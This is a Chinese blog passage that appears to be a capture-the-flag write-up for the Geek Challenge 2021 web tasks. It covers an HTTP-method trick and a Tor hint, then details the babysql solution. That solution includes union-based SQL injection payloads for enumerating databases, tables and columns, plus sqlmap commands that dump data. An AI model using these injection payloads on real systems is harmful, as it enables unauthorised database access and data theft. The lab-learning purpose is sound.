文章目录
极客大挑战2021
Welcome2021
- 极客大挑战2021
- Welcome2021
- Dark
- babysql
- babyphp
- Baby_PHP_Black_Magic_Enlightenment
- 蜜雪冰城甜蜜蜜
- 雷克雅未克
- babyxss
- 人民艺术家
- babyPy
- where_is_my_FUMO
- babyPOP
- givemeyourlove
- SoEzUnser
- Easypop
- 期末不挂科就算成功
- 成全
- 利用命令执行
- 利用日志
- anothersql
- 脚本直接爆
- 报错注入
- Easypy
- easysql
- noobPHP
- easyGO
- breakout
- 关于绕过disable_functions
- validation
- 官方文档
考点:http头请求方法
F12,提示请使用WELCOME请求方法来请求此网页
burp抓包,修改请求方法,发现f1111aaaggg9.php
再次请求得到flag
Tor浏览器(洋葱浏览器)直接访问访问即可。 但前提自己需要去配好Tor浏览器。
babysql考点:没有任何过滤的union注入
前面还是先查是整数注入还是字符注入
查列数
uname=1' order by 4#
查库:babysql
uname=-1' union select database(),2,3,4#&pwd=1
查表:jeff,jeffjokes
uname=-1' union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=database()%23&pwd=1
查列:
jeff
uname,pwd,zzzz,uselesss
uname=-1' union select group_concat(column_name),2,3,4 from information_schema.columns where table_name="jeff"%23&pwd=1
jeffjokes
id,english,chinese,misc,useless
uname=-1' union select group_concat(column_name),2,3,4 from information_schema.columns where table_name="jeffjokes"%23&pwd=1
查数据:没有查出flag
uname=-1' union select group_concat(chinese),2,3,4 from jeffjokes#&pwd=1
这儿我开始特别懵,疯狂检查我语句,试了每一表的每一个列,但是都不对。
有一句话,猜测是提示:
编译器从来不给Jeff编译警告,而是Jeff警告编译器,所有指针都是指向Jeff的,gcc的-O4优化选项是将你的代码邮件给Jeff重写一下,当Jeff触发程序的程序性能采样时,循环会因害怕而自动展开。,Jeff依然孤独地等待着数学家们解开他在PI的数字中隐藏的笑话
这是谷歌大神jeff bean的事迹
最后发现找错库了
用sqlmap爆了一下
ps: 属于sqlmap的post注入
查库:
python3 sqlmap.py -r "D:\Desktop\5.txt" -p uname --dbs
python3 sqlmap.py -r 1.txt -p uname -D flag -T fllag -C "fllllllag" --dump
babyphp
robots.txt,得到noobcurl.php
关注
打赏